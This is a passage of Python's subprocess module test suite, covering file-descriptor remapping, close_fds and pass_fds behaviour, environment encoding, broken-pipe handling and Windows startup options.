def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
            # Pure Python implementations keep the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
        # avoid messing with the larger unittest process's maximum
# number of file descriptors.
# This process launches:
        # +--> Process that lowers its RLIMIT_NOFILE after setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
        # Leave two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = [sys.executable, '-c', 'pass']
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
pid = proc.pid
pid, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
        # We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = [sys.executable, "-c", "pass"]
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with support.check_warnings((".*overriding close_fds", RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
        # Some win32 buildbots raise EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
